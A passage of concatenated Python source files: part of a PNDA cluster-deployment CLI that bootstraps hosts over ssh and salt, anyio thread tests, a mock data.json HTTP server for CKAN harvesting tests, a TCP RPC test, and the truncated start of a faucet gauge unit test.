saltmaster_ip): platform_certs_tarball = None try: local_certs_path = self._pnda_env['security']['SECURITY_MATERIAL_PATH'] platform_certs_tarball = '%s.tar.gz' % str(uuid.uuid1()) with tarfile.open(platform_certs_tarball, mode='w:gz') as archive: archive.add(local_certs_path, arcname='security-certs', recursive=True) except Exception as exception: if self._pnda_env['security']['SECURITY_MODE'] == 'permissive': LOG.warning(exception) return None else: CONSOLE.error(exception) raise PNDAConfigException("Error: %s must contain certificates" % local_certs_path) self._ssh_client.scp([platform_certs_tarball], saltmaster_ip) os.remove(platform_certs_tarball) return platform_certs_tarball def _get_volume_info(self, node_type, config_file): volumes = None if node_type: with open(config_file, 'r') as infile: volume_config = yaml.load(infile) volume_class = volume_config['instances'][node_type] volumes = volume_config['classes'][volume_class] return volumes def _set_up_env_conf(self): self._write_pnda_env_sh(self._cluster) self._ssh_client.write_ssh_config(self._get_bastion_ip(), self._pnda_env['infrastructure']['OS_USER'], os.path.abspath(self._keyfile)) def _write_pnda_env_sh(self, cluster): client_only = ['AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY', 'PLATFORM_GIT_BRANCH'] with open('cli/pnda_env_%s.sh' % cluster, 'w') as pnda_env_sh_file: for section in self._pnda_env: for setting in self._pnda_env[section]: if setting not in client_only: val = '"%s"' % self._pnda_env[section][setting] if isinstance( self._pnda_env[section][setting], (list, tuple)) else self._pnda_env[section][setting] pnda_env_sh_file.write('export %s=%s\n' % (setting, val)) def _bootstrap(self, instance, saltmaster, cluster, flavor, branch, salt_tarball, certs_tarball, error_queue, bootstrap_files=None, bootstrap_commands=None): ret_val = None try: ip_address = instance['private_ip_address'] CONSOLE.debug('bootstrapping %s', ip_address) node_type = instance['node_type'] if len(node_type) <= 0: return type_script = 'bootstrap-scripts/%s/%s.sh' % (flavor, node_type) if not os.path.isfile(type_script): type_script = 'bootstrap-scripts/%s.sh' % (node_type) node_idx = instance['node_idx'] files_to_scp = ['cli/pnda_env_%s.sh' % cluster, 'bootstrap-scripts/package-install.sh', 'bootstrap-scripts/base.sh', 'bootstrap-scripts/base_post.sh', 'bootstrap-scripts/volume-mappings.sh', type_script] volume_config = 'bootstrap-scripts/%s/%s' % (flavor, 'volume-config.yaml') requested_volumes = self._get_volume_info(node_type, volume_config) cmds_to_run = ['source /tmp/pnda_env_%s.sh' % cluster, 'export PNDA_SALTMASTER_IP=%s' % saltmaster, 'export PNDA_CLUSTER=%s' % cluster, 'export PNDA_FLAVOR=%s' % flavor, 'export PLATFORM_GIT_BRANCH=%s' % branch, 'export PLATFORM_SALT_TARBALL=%s' % salt_tarball if salt_tarball is not None else ':', 'export SECURITY_CERTS_TARBALL=%s' % certs_tarball if certs_tarball is not None else ':', 'sudo chmod a+x /tmp/package-install.sh', 'sudo chmod a+x /tmp/base.sh', 'sudo chmod a+x /tmp/base_post.sh', 'sudo chmod a+x /tmp/volume-mappings.sh'] if requested_volumes is not None and 'partitions' in requested_volumes: cmds_to_run.append('sudo mkdir -p /etc/pnda/disk-config && echo \'%s\' | sudo tee /etc/pnda/disk-config/partitions' % '\n'.join( requested_volumes['partitions'])) if requested_volumes is not None and 'volumes' in requested_volumes: cmds_to_run.append('sudo mkdir -p /etc/pnda/disk-config && echo \'%s\' | sudo tee /etc/pnda/disk-config/requested-volumes' % '\n'.join( requested_volumes['volumes'])) cmds_to_run.append('(sudo -E /tmp/base.sh 2>&1) | tee -a pnda-bootstrap.log; %s' % THROW_BASH_ERROR) if node_type == self._node_config['salt-master-instance'] or "is_saltmaster" in instance: cmds_to_run.append('echo \'%s\' | tee /tmp/minions_list' % '\n'.join(self._get_minions_to_bootstrap())) files_to_scp.append('bootstrap-scripts/saltmaster-gen-keys.sh') cmds_to_run.append('sudo chmod a+x /tmp/saltmaster-gen-keys.sh') files_to_scp.append('bootstrap-scripts/saltmaster-common.sh') cmds_to_run.append('sudo chmod a+x /tmp/saltmaster-common.sh') cmds_to_run.append('(sudo -E /tmp/saltmaster-common.sh 2>&1) | tee -a pnda-bootstrap.log; %s' % THROW_BASH_ERROR) if os.path.isfile('git.pem'): files_to_scp.append('git.pem') files_to_scp.append(self._keyfile) cmds_to_run.append('sudo chmod a+x /tmp/%s.sh' % node_type) cmds_to_run.append('(sudo -E /tmp/%s.sh %s 2>&1) | tee -a pnda-bootstrap.log; %s' % (node_type, node_idx, THROW_BASH_ERROR)) cmds_to_run.append('(sudo -E /tmp/base_post.sh 2>&1) | tee -a pnda-bootstrap.log; %s' % THROW_BASH_ERROR) cmds_to_run.append('touch ~/.bootstrap_complete') self._ssh_client.scp(files_to_scp, ip_address) self._ssh_client.ssh(cmds_to_run, ip_address) if bootstrap_files is not None: map(bootstrap_files.put, files_to_scp) bootstrap_files.put(volume_config) if bootstrap_commands is not None: map(bootstrap_commands.put, cmds_to_run) except: ret_val = 'Error for host %s. %s' % (instance['name'], traceback.format_exc()) CONSOLE.error(ret_val) error_queue.put(ret_val) def _process_thread_errors(self, action, errors): while not errors.empty(): error_message = errors.get() raise Exception("Error %s, error msg: %s. See debug log (%s) for details." % (action, error_message, LOG_FILE_NAME)) def _wait_on_host_operations(self, action, thread_list, bastion_used, errors): # Run the threads in thread_list in sets, waiting for each set to # complete before moving onto the next. generic_timeout_minutes = 10 thread_set_size = self._pnda_env['cli']['MAX_SIMULTANEOUS_OUTBOUND_CONNECTIONS'] thread_sets = [thread_list[x:x+thread_set_size] for x in xrange(0, len(thread_list), thread_set_size)] for thread_set in thread_sets: for thread in thread_set: thread.start() if bastion_used: # If there is no bastion, start all threads at once. Otherwise leave a gap # between starting each one to avoid overloading the bastion with too many # inbound connections and possibly having one rejected. wait_seconds = 2 CONSOLE.debug('Staggering connections to avoid overloading bastion, waiting %s seconds', wait_seconds) time.sleep(wait_seconds) for thread in thread_set: thread.join(generic_timeout_minutes * 60) if thread.isAlive(): raise Exception("Error %s, timeout after %s minutes. See debug log (%s) for details." % (action, generic_timeout_minutes, LOG_FILE_NAME)) if errors is not None: self._process_thread_errors(action, errors) def _wait_for_host_connectivity(self, hosts, bastion_used, check_func=None): wait_threads = [] def do_wait(host): while True: try: CONSOLE.info('Checking connectivity to %s', host) if check_func is not None: check_func() else: self._ssh_client.ssh(['ls ~'], host) break except: LOG.debug('Still waiting for connectivity to %s.', host) LOG.info(traceback.format_exc()) time.sleep(2) for host in hosts: thread = Thread(target=do_wait, args=[host]) thread.daemon = True wait_threads.append(thread) self._wait_on_host_operations('waiting for host connectivity', wait_threads, bastion_used, None) def _restart_minions(self, hosts, bastion_used): wait_threads = [] def do_cmd(host): CONSOLE.info('Restarting salt minion on %s', host) self._ssh_client.ssh(['sudo service salt-minion restart'], host) for host in hosts: thread = Thread(target=do_cmd, args=[host]) thread.daemon = True wait_threads.append(thread) self._wait_on_host_operations('restarting salt minions', wait_threads, bastion_used, None) time.sleep(60) def _export_bootstrap_resources(self, cluster, files, commands): with tarfile.open('cli/logs/%s_%s_bootstrap-resources.tar.gz' % (cluster, MILLI_TIME()), "w:gz") as tar: map(tar.add, files) command_text = StringIO.StringIO() command_text.write('\n'.join([command for command in commands if command.startswith('export')])) command_text.seek(0) command_info = tarfile.TarInfo(name="cli/additional_exports.sh") command_info.size = len(command_text.buf) tar.addfile(tarinfo=command_info, fileobj=command_text) def _get_minions_to_bootstrap(self): return ['%s %s' % (instance_name, instance_properties['private_ip_address']) for instance_name, instance_properties in self.get_instance_map().iteritems() if not instance_properties['bootstrapped']] def _get_bastion_ip(self): bastion_ip = None if self._flavor is not None: instance_map = self.get_instance_map() bastion = self._node_config['bastion-instance'] bastion_name = self._cluster + '-' + bastion if bastion_name in instance_map.keys(): bastion_ip = instance_map[self._cluster + '-' + bastion]['ip_address'] return bastion_ip def _install_pnda(self): to_runfile({'cmdline':sys.argv, 'bastion':self._node_config['bastion-instance'], 'saltmaster':self._node_config['salt-master-instance']}) instance_map = self.get_instance_map() bastion_ip = self._get_bastion_ip() CONSOLE.debug('The PNDA console will come up on: http://%s', instance_map[self._cluster + '-' + self._node_config['console-instance']]['private_ip_address']) def prepare_bastion(): # Configure the bastion with the PNDA mirror and install nc on it # nc is required for relaying commands through the bastion # to do anything on the other instances files_to_scp = ['cli/pnda_env_%s.sh' % self._cluster, 'bootstrap-scripts/package-install.sh'] cmds_to_run = ['source /tmp/pnda_env_%s.sh' % self._cluster, 'export PNDA_CLUSTER=%s' % self._cluster, 'export PNDA_FLAVOR=%s' % self._flavor, 'sudo chmod a+x /tmp/package-install.sh', 'sudo -E /tmp/package-install.sh', 'sudo yum install -y nc'] nc_scp_cmd = "scp -i %s -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null %s %s@%s:%s" % ( self._keyfile, ' '.join(files_to_scp), self._pnda_env['infrastructure']['OS_USER'], bastion_ip, '/tmp') CONSOLE.debug(nc_scp_cmd) ret_val = subprocess_to_log.call(nc_scp_cmd.split(' '), LOG, log_id=bastion_ip) if ret_val != 0: raise Exception("Error transferring files to new host %s via SCP. See debug log (%s) for details." % (bastion_ip, LOG_FILE_NAME)) nc_ssh_cmd = 'ssh -i %s -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null %s@%s' % ( self._keyfile, self._pnda_env['infrastructure']['OS_USER'], bastion_ip) nc_install_cmd = nc_ssh_cmd.split(' ') nc_install_cmd.append(' && '.join(cmds_to_run)) CONSOLE.debug(nc_install_cmd) ret_val = subprocess_to_log.call(nc_install_cmd, LOG, log_id=bastion_ip) if ret_val != 0: raise Exception("Error running ssh commands on host %s. See debug log (%s) for details." % (bastion_ip, LOG_FILE_NAME)) if bastion_ip: self._wait_for_host_connectivity([bastion_ip], False, prepare_bastion) self._wait_for_host_connectivity([instance_map[h]['private_ip_address'] for h in instance_map], bastion_ip is not None) CONSOLE.info('Bootstrapping saltmaster. Expect this to take a few minutes, check the debug log for progress (%s).', LOG_FILE_NAME) saltmaster = instance_map[self._cluster + '-' + self._node_config['salt-master-instance']] saltmaster_ip = saltmaster['private_ip_address'] platform_salt_tarball = None if 'PLATFORM_SALT_LOCAL' in self._pnda_env['platform_salt']: local_salt_path = self._pnda_env['platform_salt']['PLATFORM_SALT_LOCAL'] platform_salt_tarball = '%s.tmp' % str(uuid.uuid1()) with tarfile.open(platform_salt_tarball, mode='w:gz') as archive: archive.add(local_salt_path, arcname='platform-salt', recursive=True) self._ssh_client.scp([platform_salt_tarball], saltmaster_ip) os.remove(platform_salt_tarball) platform_certs_tarball = None if self._pnda_env['security']['SECURITY_MODE'] != 'disabled': platform_certs_tarball = self._ship_certs(saltmaster_ip) bootstrap_threads = [] bootstrap_errors = Queue.Queue() bootstrap_files = Queue.Queue() bootstrap_commands = Queue.Queue() self._bootstrap(saltmaster, saltmaster_ip, self._cluster, self._flavor, self._branch, platform_salt_tarball, platform_certs_tarball, bootstrap_errors, bootstrap_files, bootstrap_commands) self._process_thread_errors('bootstrapping saltmaster', bootstrap_errors) CONSOLE.info('Bootstrapping other instances. Expect this to take a few minutes, check the debug log for progress (%s).', LOG_FILE_NAME) for key, instance in instance_map.iteritems(): if '-' + self._node_config['salt-master-instance'] not in key: thread = Thread(target=self._bootstrap, args=[instance, saltmaster_ip, self._cluster, self._flavor, self._branch, platform_salt_tarball, None, bootstrap_errors, bootstrap_files, bootstrap_commands]) thread.daemon = True bootstrap_threads.append(thread) self._wait_on_host_operations('bootstrapping host', bootstrap_threads, bastion_ip is not None, bootstrap_errors) self._export_bootstrap_resources(self._cluster, list(set(bootstrap_files.queue)), list(set(bootstrap_commands.queue))) time.sleep(30) CONSOLE.info('Running salt to install software. Expect this to take 45 minutes or more, check the debug log for progress (%s).', LOG_FILE_NAME) # Consul is installed first, before restarting the minion to pick up # changes to resolv.conf (see https://github.com/saltstack/salt/issues/21397) # We then wait 60 seconds before continuing with highstate to allow the minions to restart # An improvement would be running a test.ping and waiting for all expected minions to be ready CONSOLE.info('Installing Consul') self._ssh_client.ssh(['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed "*" state.sls consul,consul.dns queue=True 2>&1)' ' | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR], saltmaster_ip) CONSOLE.info('Restarting minions') self._restart_minions([instance_map[h]['private_ip_address'] for h in instance_map], bastion_ip is not None) CONSOLE.info('Refreshing salt mines') self._ssh_client.ssh(['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed "*" mine.update 2>&1) | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR], saltmaster_ip) self._register_services(saltmaster_ip) CONSOLE.info('Continuing with installation of PNDA') self._ssh_client.ssh(['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed "*"' ' state.highstate queue=True 2>&1) | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR, '(sudo CLUSTER=%s salt-run --log-level=debug state.orchestrate orchestrate.pnda 2>&1) | tee -a pnda-salt.log; %s' % (self._cluster, THROW_BASH_ERROR)], saltmaster_ip) def _register_services(self, saltmaster_ip): CONSOLE.info('Populating %s with services', self._service_registry.name) # Read descriptor service_to_role_descriptor = self._get_service_to_role_descriptor() # Find hosts with those roles using grains instances = self.get_instance_map() affected_hosts = [] for service in service_to_role_descriptor: role = service_to_role_descriptor[service]['role'] port = service_to_role_descriptor[service]['port'] hosts_for_role = self._get_hosts_for_role(saltmaster_ip, role) # Get the addresses for those hosts def ip_for_service(name, props): return 'private_ip_address' if name.endswith('-internal') or not props['ip_address'] else 'ip_address' addresses_for_service = [instances[host][ip_for_service(service, instances[host])] for host in hosts_for_role] # Push records into registry mapping service->address affected_hosts.extend(hosts_for_role) self._service_registry.register_service_record(service, addresses_for_service, port) self._service_registry.commit([instances[host]['private_ip_address'] for host in set(affected_hosts)]) def _get_service_to_role_descriptor(self): rts_filepath = 'bootstrap-scripts/service_to_role.json' with open(rts_filepath, 'r') as mapping_file: mapping_data = json.loads(mapping_file.read()) return mapping_data def _get_hosts_for_role(self, saltmaster_ip, role): output = [] self._ssh_client.ssh(['(sudo salt-call pnda.get_hosts_for_role %s 2>&1) | tee -a pnda-salt.log; %s' % (role, THROW_BASH_ERROR)], saltmaster_ip, output) hosts_for_role = [] for line in output: if line.strip().startswith('-'): hosts_for_role.append(line.strip().split('- ')[1]) CONSOLE.debug('Hosts for role %s are: %s', role, json.dumps(hosts_for_role)) return hosts_for_role def _expand_pnda(self, do_orchestrate): instance_map = self.get_instance_map(True) bastion_ip = self._get_bastion_ip() saltmaster = instance_map[self._cluster + '-' + self._node_config['salt-master-instance']] saltmaster_ip = saltmaster['private_ip_address'] self._ssh_client.ssh(['rm -rf /tmp/%s || true' % self._keyfile], saltmaster_ip) self._ssh_client.scp([self._keyfile, 'cli/pnda_env_%s.sh' % self._cluster, 'bootstrap-scripts/saltmaster-gen-keys.sh'], saltmaster_ip) self._ssh_client.ssh(['echo \'%s\' | tee /tmp/minions_list' % '\n'.join(self._get_minions_to_bootstrap()), 'source /tmp/pnda_env_%s.sh' % self._cluster, 'sudo chmod a+x /tmp/saltmaster-gen-keys.sh', 'sudo -E /tmp/saltmaster-gen-keys.sh'], saltmaster_ip) self._wait_for_host_connectivity([instance_map[h]['private_ip_address'] for h in instance_map], bastion_ip is not None) CONSOLE.info('Bootstrapping new instances. Expect this to take a few minutes, check the debug log for progress. (%s)', LOG_FILE_NAME) bootstrap_threads = [] bootstrap_errors = Queue.Queue() for _, instance in instance_map.iteritems(): if instance['node_type'] and not instance['bootstrapped']: thread = Thread(target=self._bootstrap, args=[instance, saltmaster_ip, self._cluster, self._flavor, self._branch, None, None, bootstrap_errors]) bootstrap_threads.append(thread) thread.daemon = True self._wait_on_host_operations('bootstrapping host', bootstrap_threads, bastion_ip is not None, bootstrap_errors) time.sleep(30) CONSOLE.info('Running salt to install software. Expect this to take 10 - 20 minutes, check the debug log for progress. (%s)', LOG_FILE_NAME) # Consul is installed first, before restarting the minion to pick up # changes to resolv.conf (see https://github.com/saltstack/salt/issues/21397) # We then wait 60 seconds before continuing with highstate to allow the minions to restart # An improvement would be running a test.ping and waiting for all expected minions to be ready CONSOLE.info('Installing Consul') self._ssh_client.ssh(['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed' ' -C "G@pnda:is_new_node" state.sls consul,consul.dns queue=True 2>&1)' ' | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR], saltmaster_ip) CONSOLE.info('Restarting minions') self._restart_minions([instance_map[h]['private_ip_address'] for h in instance_map], bastion_ip is not None) CONSOLE.info('Refreshing salt mines') self._ssh_client.ssh(['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed "*" mine.update 2>&1) | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR], saltmaster_ip) self._register_public_services(saltmaster_ip) CONSOLE.info('Continuing with installation of PNDA') expand_commands = ['(sudo salt -v --log-level=debug --timeout=120 --state-output=mixed -C "G@pnda:is_new_node" state.highstate queue=True 2>&1)' + ' | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR] if do_orchestrate: CONSOLE.info('Including orchestrate because new Hadoop datanodes are being added') expand_commands.append('(sudo CLUSTER=%s salt-run --log-level=debug state.orchestrate orchestrate.pnda-expand 2>&1)' % self._cluster + ' | tee -a pnda-salt.log; %s' % THROW_BASH_ERROR) self._ssh_client.ssh(expand_commands, saltmaster_ip) def _destroy_pnda(self): CONSOLE.info('Removing ssh access scripts') socks_proxy_file = 'cli/socks_proxy-%s' % self._cluster if os.path.exists(socks_proxy_file): os.remove(socks_proxy_file) ssh_config_file = 'cli/ssh_config-%s' % self._cluster if os.path.exists(ssh_config_file): os.remove(ssh_config_file) env_sh_file = 'cli/pnda_env_%s.sh' % self._cluster if os.path.exists(env_sh_file): os.remove(env_sh_file) def _check_hosts_bootstrapped(self, instances, bastion_used): check_threads = [] check_results = Queue.Queue() def do_check(host_key, host, check_results): try: CONSOLE.info('Checking bootstrap status for %s', host) self._ssh_client.ssh(['ls ~/.bootstrap_complete'], host) CONSOLE.debug('Host is bootstrapped: %s.', host) check_results.put(host_key) except: CONSOLE.debug('Host is not bootstrapped: %s.', host) for key, instance in instances.iteritems(): thread = Thread(target=do_check, args=[key, instance['private_ip_address'], check_results]) thread.daemon = True check_threads.append(thread) self._wait_on_host_operations('checking bootstrap status', check_threads, bastion_used, None) while not check_results.empty(): host_key = check_results.get() instances[host_key]['bootstrapped'] = True def _check_config(self, keyfile): self._check_private_key_exists(keyfile) self._check_pnda_mirror() self.check_target_specific_config() def _check_private_key_exists(self, keyfile): if not os.path.isfile(keyfile): CONSOLE.info('Keyfile.......... ERROR') CONSOLE.error('Did not find local file named %s', keyfile) sys.exit(1) CONSOLE.info('Keyfile.......... OK') def _check_pnda_mirror(self): def raise_error(reason): CONSOLE.info('PNDA mirror...... ERROR') CONSOLE.error(reason) CONSOLE.error(traceback.format_exc()) sys.exit(1) try: mirror = self._pnda_env['mirrors']['PNDA_MIRROR'] response = requests.head(mirror) # expect 200 (open mirror) 403 (no listing allowed) # or any redirect (in case of proxy/redirect) if response.status_code not in [200, 403, 301, 302, 303, 307, 308]: raise_error("PNDA mirror configured and present " "but responded with unexpected status code (%s). " % response.status_code) CONSOLE.info('PNDA mirror...... OK') except KeyError: raise_error('PNDA mirror was not defined in pnda_env.yaml') except: raise_error("Failed to connect to PNDA mirror. Verify connection " "to %s, check mirror in pnda_env.yaml and try again." % mirror)
test_threads.py
import asyncio import sys import threading import time from concurrent.futures import CancelledError from contextlib import suppress import pytest from anyio import ( create_blocking_portal, create_capacity_limiter, create_event, create_task_group, run_async_from_thread, run_sync_in_worker_thread, sleep, start_blocking_portal, wait_all_tasks_blocked) if sys.version_info < (3, 9): current_task = asyncio.Task.current_task else: current_task = asyncio.current_task pytestmark = pytest.mark.anyio async def test_run_async_from_thread(): async def add(a, b): assert threading.get_ident() == event_loop_thread_id return a + b def worker(a, b): assert threading.get_ident() != event_loop_thread_id return run_async_from_thread(add, a, b) event_loop_thread_id = threading.get_ident() result = await run_sync_in_worker_thread(worker, 1, 2) assert result == 3 async def test_run_anyio_async_func_from_thread(): def worker(*args): run_async_from_thread(sleep, *args) return True assert await run_sync_in_worker_thread(worker, 0) async def test_run_in_thread_cancelled(): def thread_worker(): nonlocal state state = 2 async def worker(): nonlocal state state = 1 await run_sync_in_worker_thread(thread_worker) state = 3 state = 0 async with create_task_group() as tg: await tg.spawn(worker) await tg.cancel_scope.cancel() assert state == 1 async def test_run_in_thread_exception(): def thread_worker(): raise ValueError('foo') with pytest.raises(ValueError) as exc: await run_sync_in_worker_thread(thread_worker) exc.match('^foo$') async def test_run_in_custom_limiter(): def thread_worker(): nonlocal num_active_threads, max_active_threads num_active_threads += 1 max_active_threads = max(num_active_threads, max_active_threads) event.wait(1) num_active_threads -= 1 async def task_worker(): await run_sync_in_worker_thread(thread_worker, limiter=limiter) event = threading.Event() num_active_threads = max_active_threads = 0 limiter = create_capacity_limiter(3) async with create_task_group() as tg: for _ in range(4): await tg.spawn(task_worker) await sleep(0.1) assert num_active_threads == 3 assert limiter.borrowed_tokens == 3 event.set() assert num_active_threads == 0 assert max_active_threads == 3 def test_run_async_from_unclaimed_thread(): async def foo(): pass exc = pytest.raises(RuntimeError, run_async_from_thread, foo) exc.match('This function can only be run from an AnyIO worker thread') @pytest.mark.parametrize('cancellable, expected_last_active', [ (False, 'task'), (True, 'thread') ], ids=['uncancellable', 'cancellable']) async def test_cancel_worker_thread(cancellable, expected_last_active): """ Test that when a task running a worker thread is cancelled, the cancellation is not acted on until the thread finishes. """ def thread_worker(): nonlocal last_active run_async_from_thread(sleep_event.set) time.sleep(0.2) last_active = 'thread' run_async_from_thread(finish_event.set) async def task_worker(): nonlocal last_active try: await run_sync_in_worker_thread(thread_worker, cancellable=cancellable) finally: last_active = 'task' sleep_event = create_event() finish_event = create_event() last_active = None async with create_task_group() as tg: await tg.spawn(task_worker) await sleep_event.wait() await tg.cancel_scope.cancel() await finish_event.wait() assert last_active == expected_last_active @pytest.mark.parametrize('anyio_backend', ['asyncio']) async def test_cancel_asyncio_native_task(): async def run_in_thread(): nonlocal task task = current_task() await run_sync_in_worker_thread(time.sleep, 1, cancellable=True) task = None async with create_task_group() as tg: await tg.spawn(run_in_thread) await wait_all_tasks_blocked() task.cancel() class TestBlockingPortal: async def test_successful_call(self): async def async_get_thread_id(): return threading.get_ident() def external_thread(): thread_ids.append(portal.call(threading.get_ident)) thread_ids.append(portal.call(async_get_thread_id)) thread_ids = [] async with create_blocking_portal() as portal: thread = threading.Thread(target=external_thread) thread.start() await run_sync_in_worker_thread(thread.join) for thread_id in thread_ids: assert thread_id == threading.get_ident() async def test_aexit_with_exception(self): """Test that when the portal exits with an exception, all tasks are cancelled.""" def external_thread(): try: portal.call(sleep, 3) except BaseException as exc: results.append(exc) else: results.append(None) results = [] with suppress(Exception): async with create_blocking_portal() as portal: thread1 = threading.Thread(target=external_thread) thread1.start() thread2 = threading.Thread(target=external_thread) thread2.start() await sleep(0.1) assert not results raise Exception await run_sync_in_worker_thread(thread1.join) await run_sync_in_worker_thread(thread2.join) assert len(results) == 2 assert isinstance(results[0], CancelledError) assert isinstance(results[1], CancelledError) async def test_aexit_without_exception(self): """Test that when the portal exits, it waits for all tasks to finish.""" def external_thread(): try: portal.call(sleep, 0.2) except BaseException as exc: results.append(exc) else: results.append(None) results = [] async with create_blocking_portal() as portal: thread1 = threading.Thread(target=external_thread) thread1.start() thread2 = threading.Thread(target=external_thread) thread2.start() await sleep(0.1) assert not results await run_sync_in_worker_thread(thread1.join) await run_sync_in_worker_thread(thread2.join) assert results == [None, None] async def test_call_portal_from_event_loop_thread(self): async with create_blocking_portal() as portal: exc = pytest.raises(RuntimeError, portal.call, threading.get_ident) exc.match('This method cannot be called from the event loop thread') @pytest.mark.parametrize('use_contextmanager', [False, True], ids=['contextmanager', 'startstop']) def test_start_with_new_event_loop(self, anyio_backend_name, anyio_backend_options, use_contextmanager): async def async_get_thread_id(): return threading.get_ident() if use_contextmanager: with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal: thread_id = portal.call(async_get_thread_id) else: portal = start_blocking_portal(anyio_backend_name, anyio_backend_options) try: thread_id = portal.call(async_get_thread_id) finally: portal.call(portal.stop) assert isinstance(thread_id, int) assert thread_id != threading.get_ident() def test_call_stopped_portal(self, anyio_backend_name, anyio_backend_options): portal = start_blocking_portal(anyio_backend_name, anyio_backend_options) portal.call(portal.stop) pytest.raises(RuntimeError, portal.call, threading.get_ident).\ match('This portal is not running')
mock_datajson_source.py
from __future__ import print_function import json import logging import os import SimpleHTTPServer import SocketServer from threading import Thread import pkg_resources from ckanext import datajson log = logging.getLogger("harvester") class MockDataJSONHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): log.info('GET mock at: {}'.format(self.path)) # test name is the first bit of the URL and makes CKAN behave # differently in some way. # Its value is recorded and then removed from the path self.test_name = None self.sample_datajson_file = None if self.path == '/arm': self.sample_datajson_file = 'arm.data.json' self.test_name = 'arm' elif self.path == '/usda': self.sample_datajson_file = 'usda.gov.data.json' self.test_name = 'usda' elif self.path == '/ny': self.sample_datajson_file = 'ny.data.json' self.test_name = 'ny' elif self.path == '/collection-1-parent-2-children.data.json': self.sample_datajson_file = 'collection-1-parent-2-children.data.json' self.test_name = 'collection-1-parent-2-children.data.json' elif self.path == '/collection-2-parent-4-children.data.json': self.sample_datajson_file = 'collection-2-parent-4-children.data.json' self.test_name = 'collection-2-parent-4-children.data.json' elif self.path == '/error-reserved-title': self.sample_datajson_file = 'reserved-title.data.json' self.test_name = 'error-reserved-title' elif self.path == '/error-large-spatial': self.sample_datajson_file = 'large-spatial.data.json' self.test_name = 'error-large-spatial' elif self.path == '/null-spatial': self.sample_datajson_file = 'null-spatial.data.json' self.test_name = 'null-spatial' elif self.path == '/404': self.test_name = 'e404' self.respond('Not found', status=404) elif self.path == '/500': self.test_name = 'e500' self.respond('Error', status=500) if self.sample_datajson_file is not None: log.info('return json file {}'.format(self.sample_datajson_file)) self.respond_json_sample_file(file_path=self.sample_datajson_file) if self.test_name is None: self.respond('Mock DataJSON doesnt recognize that call', status=400) def respond_json(self, content_dict, status=200): return self.respond(json.dumps(content_dict), status=status, content_type='application/json') def respond_json_sample_file(self, file_path, status=200): pt = pkg_resources.resource_filename(__name__, "/datajson-samples/{}".format(file_path)) data = open(pt, 'r') content = data.read() log.info('mock respond {}'.format(content[:90])) return self.respond(content=content, status=status, content_type='application/json') def respond(self, content, status=200, content_type='application/json'): self.send_response(status) self.send_header('Content-Type', content_type) self.end_headers() self.wfile.write(content) self.wfile.close() def serve(port=8998): '''Runs a CKAN-alike app (over HTTP) that is used for harvesting tests''' # Choose the directory to serve files from # os.chdir(os.path.join(os.path.dirname(os.path.abspath(__file__)), # 'mock_ckan_files')) class TestServer(SocketServer.TCPServer): allow_reuse_address = True httpd = TestServer(("", port), MockDataJSONHandler) info = 'Serving test HTTP server at port {}'.format(port) log.info(info) httpd_thread = Thread(target=httpd.serve_forever) httpd_thread.setDaemon(True) httpd_thread.start()
test_threads.py
import socket import threading import server from helpers import PlainRPCClient class TCPRPCServer(server.SimpleRPCServer): def __init__(self): super(TCPRPCServer, self).__init__(self.my_send) self.sock = None self.conn = None self.t = threading.Thread(target=self.run) self.t.daemon = True # to avoid the hassle of server graceful shutdown def my_send(self, msg): self.conn.sendall(msg) def open(self, host, port): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.bind((host, port)) self.sock.listen(1) self.t.start() def run(self): self.conn, addr = self.sock.accept() print('Connected by', addr) while True: chunk = self.conn.recv(2048) if chunk == '': raise RuntimeError("socket connection broken") self.received_data(chunk) import serdes class TCPRPCClient(PlainRPCClient): def __init__(self): super(TCPRPCClient, self).__init__(self.my_send, self.my_receive) self.serdes = serdes.SerDesMsgpack() self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def connect(self, host, port): self.sock.connect((host, port)) def my_send(self, msg): self.sock.sendall(self.serdes.serialize(msg)) def my_receive(self): while True: chunk = self.sock.recv(2048) if chunk == '': raise RuntimeError("socket connection broken") return self.serdes.deserialize(chunk) def test_tcp(tester): server = TCPRPCServer() client = TCPRPCClient() server.open('localhost', 5000) client.connect('localhost', 5000) def shutdown(): # FIXME: close the server socket pass tester(server, client.call, shutdown)
test_gauge.py
"""Unit tests for gauge""" from collections import namedtuple import random import re import shutil import tempfile import threading import time import os import unittest from unittest import mock from http.server import HTTPServer, BaseHTTPRequestHandler import yaml import requests from requests.exceptions import ReadTimeout from ryu.controller.ofp_event import EventOFPMsgBase from ryu.lib import type_desc from ryu.lib import hub from ryu.ofproto import ofproto_v1_3 as ofproto from ryu.ofproto import ofproto_v1_3_parser as parser from prometheus_client import CollectorRegistry from faucet import gauge, gauge_prom, gauge_influx, gauge_pollers, watcher, valve_util class QuietHandler(BaseHTTPRequestHandler): """Don't log requests.""" def log_message(self, _format, *_args): pass def create_mock_datapath(num_ports): """Mock a datapath by creating mocked datapath ports.""" dp_id = random.randint(1, 5000) dp_name = mock.PropertyMock(return_value='datapath') def table_by_id(i): table = mock.Mock() table_name = mock.PropertyMock(return_value='table' + str(i)) type(table).name = table_name return table def port_labels(port_no): return { 'port': 'port%u' % port_no, 'port_description': 'port%u' % port_no, 'dp_id': hex(dp_id), 'dp_name': dp_name} ports = {} for i in range(1, num_ports + 1): port = mock.Mock() port_name = mock.PropertyMock(return_value='port' + str(i)) type(port).name = port_name ports[i] = port datapath = mock.Mock(ports=ports, dp_id=dp_id, port_labels=port_labels, table_by_id=table_by_id) type(datapath).name = dp_name return datapath def start_server(handler): """ Starts a HTTPServer and runs it as a daemon thread """ server = HTTPServer(('', 0), handler) server_thread = threading.Thread(target=server.serve_forever) server_thread.daemon = True server_thread.start() return server def port_state_msg(datapath, 